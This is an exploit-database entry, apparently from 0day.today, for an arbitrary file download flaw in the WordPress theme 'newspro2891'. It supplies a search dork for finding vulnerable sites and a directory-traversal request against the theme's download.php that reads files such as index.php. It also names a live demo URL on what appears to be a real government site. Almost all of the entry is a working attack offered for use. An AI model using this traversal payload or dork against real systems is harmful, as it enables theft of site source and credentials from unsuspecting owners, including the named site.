id: 29596
date: 01/21/2018
title: Wordpress newspro2891 theme - Arbitrary file download Vulnerability
author: MrSqar
cves: 

-===================足====================足=================-
# Exploit title : Wordpress newspro2891 theme - Arbitrary file download
# author : MrSqar Yemeni hacker
# Team : IT-Geeks
# dork : inurl:/wp-content/themes/newspro2891
# Tested on : BackBox linux
# check if site is vulnerabe : /wp-content/themes/newspro2891/download.php
you can download any script from the site by this method 
site.com/wp-content/themes/newspro2891/download.php?file=../index.php
# deom site :
http://17greengrowth.pa.go.kr/wp-content/themes/newspro2891/download.php?file=../index.php
 -===================足====================足=================-

#  0day.today [2023-03-22]  #